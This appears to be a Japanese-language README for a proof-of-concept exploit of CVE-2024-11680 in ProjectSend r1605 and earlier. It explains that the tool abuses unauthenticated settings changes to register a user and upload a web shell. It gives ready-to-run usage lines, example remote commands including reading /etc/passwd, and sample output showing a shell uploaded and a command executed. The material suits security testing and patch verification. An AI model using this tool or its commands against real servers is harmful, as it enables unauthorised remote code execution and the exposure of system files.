
このリポジトリには、CVE-2024-11680(ProjectSend r1605 およびそれ以前のバージョンにおける深刻な脆弱性)の Proof-of-Concept (PoC) エクスプロイトが含まれています。このエクスプロイトは、不適切な権限設定とコマンドインジェクションの問題による誤った認証を対象としています。
これは、ProjectSend における CVE-2024-11680 の概念実証エクスプロイトです。この脆弱性は認証不要の設定変更とウェブシェルのアップロードを可能にします。
このエクスプロイトは ProjectSend の複数の脆弱性を利用します:
pip install requests colorama
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
-u, --url: ターゲットURL (例: http://target.com/projectsend)-c, --command: ターゲット上で実行するコマンド (デフォルト: id)# Python バージョンを取得
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# ディレクトリ内容を一覧表示
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# システム情報を取得
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# passwd ファイルを読み取り
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
このツールは教育目的のみです。責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2